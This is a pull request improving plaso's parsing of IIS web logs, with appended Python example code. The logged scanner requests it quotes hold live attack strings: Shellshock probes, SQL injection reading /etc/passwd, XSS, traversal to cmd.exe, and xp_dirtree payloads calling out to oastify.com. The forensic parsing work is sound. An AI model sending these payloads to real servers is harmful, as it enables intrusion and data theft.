Further IIS parsing improvements #4921

Open
wants to merge 1 commit into
base: main
Conversation

pyllyukko
Contributor

Ran a few scanners against vanilla IIS running in Windows Server 2022 and made sure everything parses.

Details:

Iteration 1

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 20 "2024-11-11 18:59:21
                     10.0.2.15 GET /1UNkBV0Q.* - 80 - 10.0.2.15
                     Mozilla/5.0+(W..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/evidences/u_ex241111.log
--------------------------------------------------------------------------------

Add * to _URI_SAFE_CHARACTERS.

Iteration 2

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 49 "2024-11-11 18:59:21
                     10.0.2.15 GET /1UNkBV0Q.php~ - 80 - 10.0.2.15
                     Mozilla/5.0..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Add ~ to _URI_SAFE_CHARACTERS.

Iteration 3

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 179 "2024-11-11 18:59:21
                     10.0.2.15 GET /1UNkBV0Q.bat|dir - 80 - 10.0.2.15
                     Mozilla/..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Add | to _URI_SAFE_CHARACTERS.

Iteration 4

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 802 "2024-11-11 18:59:21
                     10.0.2.15 GET / - 80 - 10.0.2.15
                     ()+{+:;+};+echo+93e4r0-C..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /           -            80     -           10.0.2.15 ()+{+:;+};+echo+93e4r0-CVE-2014-6271:+true;echo;echo; ()+{+_;+}+>_[$($())]+{+echo+93e4r0-CVE-2014-6278:+true;+echo;echo;+} 200       0            0               0
date       time     s-ip      cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                        cs(Referer)                                                          sc-status sc-substatus sc-win32-status time-taken
  • Add []<>{}$ to _URI_SAFE_CHARACTERS
    • Remove [] from _UA
    • Remove $ from _URI_STEM
    • Remove {} from _COOKIE
    • Remove {}|, ~[], <> & $ from _QUERY

Iteration 5

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 1328 "2024-11-11 18:59:21
                     10.0.2.15 GET
                     /site/'+UNION+ALL+SELECT+FileToClob('/etc/p..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /site/'+UNION+ALL+SELECT+FileToClob('/etc/passwd','server')::html,0+FROM+sysusers+WHERE+username=USER+--/.html -            80     -           10.0.2.15 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 -           404       0            2               0
date       time     s-ip      cs-method cs-uri-stem                                                                                                    cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                                                                                      cs(Referer) sc-status sc-substatus sc-win32-status time-taken
  • Added \' to _URI_SAFE_CHARACTERS
    • Remove \' from _QUERY

Iteration 6

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 1517 "2024-11-11 18:59:21
                     10.0.2.15 GET /<script>alert("xss")</script>/index.html
                     -..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------
  • Added " to _URI_SAFE_CHARACTERS
    • Removed " from _COOKIE
    • Removed " from _QUERY

Iteration 7

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 1546 "2024-11-11 18:59:21
                     10.0.2.15 GET /chat/!nicks.txt - 80 - 10.0.2.15
                     Mozilla/5..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Added ! to _URI_SAFE_CHARACTERS

Iteration 8

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 2555 "2024-11-11 18:59:21
                     10.0.2.15 GET /forum.asp
                     n=%60/etc/passwd%60|41|80040e14|..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

date       time     s-ip      cs-method cs-uri-stem cs-uri-query                                                                                                                s-port cs-username c-ip      cs(User-Agent)                                                                                                      cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-11-11 18:59:21 10.0.2.15 GET       /forum.asp  n=%60/etc/passwd%60|41|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;`&#039;. 80     -           10.0.2.15 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 -           404       0            2               0
  • Added "`" to _URI_SAFE_CHARACTERS
    • Removed it from _QUERY
  • Added # to _URI_SAFE_CHARACTERS

Iteration 9

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 3215 "2024-11-11 18:59:21
                     10.0.2.15 GET /certsrv/..À¯../winnt/system32/cmd.exe
                     /c+d..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET /certsrv/..À¯../winnt/system32/cmd.exe /c+dir 80 - 10.0.2.15 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/74.0.3729.169+Safari/537.36 - 404 0 2 0

Added À¯ to _URI_SAFE_CHARACTERS

Iteration 10

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 6417 "2024-11-11 18:59:21
                     10.0.2.15 GET /administraçao.php - 80 - 10.0.2.15
                     Mozill..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Added ç to _URI_SAFE_CHARACTERS

Iteration 11

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 6443 "2024-11-11 18:59:21
                     10.0.2.15 GET /adminisztrátora.php - 80 - 10.0.2.15
                     Mozi..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Added ¡ to _URI_SAFE_CHARACTERS

Iteration 12

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 8170 "2024-11-11 18:59:21
                     10.0.2.15 GET / - 80 - 10.0.2.15
                     Mozilla/5.0+(X11;+Linux+..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /           -            80     -           10.0.2.15 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0;declare+@q+varchar(99);set+@q='\\4w1vx73x693ltlawm13122r0wr2kqae14pzcp0e.oasti'+'fy.com\inx';+exec+master.dbo.xp_dirtree+@q;-- -           200       0            0               0
date       time     s-ip      cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                                                                                                                                                                        cs(Referer) sc-status sc-substatus sc-win32-status time-taken
  • Added @\\ to _UA

Iteration 13

**************************** Extraction warning: 0 *****************************
           Message : unable to parse log line: 8209 "2024-11-11 18:59:21
                     10.0.2.15 GET / - 80 - 10.0.2.15
                     Mozilla/5.0+(X11;+Linux+..."
      Parser chain : text/winiis
Path specification : type: OS, location: /data/u_ex241111.log
--------------------------------------------------------------------------------

Request:

2024-11-11 18:59:21 10.0.2.15 GET       /           -            80     -           10.0.2.15 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 https://example.com/;declare+@q+varchar(99);set+@q='\\y21p319rc39fzfgqsv9v8wxu2l8ew4kvaj56wul.oasti'+'fy.com\zmv';+exec+master.dbo.xp_dirtree+@q;-- 200       0            0               0
date       time     s-ip      cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip      cs(User-Agent)                                                         cs(Referer)                                                                                                                                         sc-status sc-substatus sc-win32-status time-taken
  • Moved @\\ to _URI_SAFE_CHARACTERS
    • Removed from _UA, _COOKIE & _QUERY

Everything parses now.

************************* Events generated per parser **************************
Parser (plugin) name : Number of events
--------------------------------------------------------------------------------
            filestat : 3
              winiis : 8312
               Total : 8315
--------------------------------------------------------------------------------

@joachimmetz
Member

@pyllyukko thanks for flagging, I'll take a closer look when time permits.

> Added ç to _URI_SAFE_CHARACTERS

This looks like IIS handling Unicode characters in a non-URI safe manner, adding individual characters is going to be a whack-a-mole approach.
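
An added example (not plaso's text/winiis parser) of the alternative the two comments above circle around: tokenizing IIS W3C lines by the `#Fields:` directive and field count instead of by a character whitelist. It assumes, as the log lines quoted in this PR show, that IIS substitutes `+` for spaces inside a value; the sample log is constructed and reuses the characters the iterations above had to whitelist one by one.

```python
"""IIS W3C extended log tokenizer driven by the #Fields: directive.

Added example, not plaso's winiis parser. Assumption (borne out by the
PR's quoted log lines): IIS writes '+' for spaces inside a field value, so
every data line has exactly as many tokens as #Fields: names, and field
values need no character whitelist, whatever a scanner sends in the URI.
"""
from collections import Counter

# Constructed sample. URI/UA values reuse characters the PR had to whitelist
# (| " < > ç @ \ ;); the last line is deliberately truncated.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-11-11 18:59:21 10.0.2.15 GET /1UNkBV0Q.bat|dir - 80 - 10.0.2.15 Mozilla/5.0+(W) - 404 0 2 0
2024-11-11 18:59:21 10.0.2.15 GET /<script>alert("xss")</script>/index.html - 80 - 10.0.2.15 Mozilla/5.0+(W) - 404 0 2 0
2024-11-11 18:59:21 10.0.2.15 GET /administraçao.php - 80 - 10.0.2.15 Mozilla/5.0+(W) - 404 0 2 0
2024-11-11 18:59:21 10.0.2.15 GET / - 80 - 10.0.2.15 Mozilla/5.0+(X11);declare+@q+varchar(99);set+@q='\\host\x';-- https://example.com/ 200 0 0 0
2024-11-11 18:59:21 10.0.2.15 GET /broken - 80
"""


def decode_value(value):
    """Undo IIS's space encoding; '-' is how IIS logs an empty field.
    A literal '+' in cs-uri-query is indistinguishable from a space here."""
    return "" if value == "-" else value.replace("+", " ")


def parse_iis_log(text):
    """Return (records, rejected_lines); rejected lines keep their raw text."""
    fields = []
    records, rejected = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()  # layout may change mid-file
            continue  # #Software, #Version, #Date carry no event
        tokens = line.split()
        if not fields or len(tokens) != len(fields):
            rejected.append(line)  # wrong token count: truncated or corrupt line
            continue
        records.append(dict(zip(fields, tokens)))
    return records, rejected


def requests_by_status(records):
    """Quick triage view: how many requests per HTTP status code."""
    return Counter(r["sc-status"] for r in records)
```

Lines that fail the token-count check are returned rather than silently dropped, so a forensic run can still report exactly which lines were not timelined.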
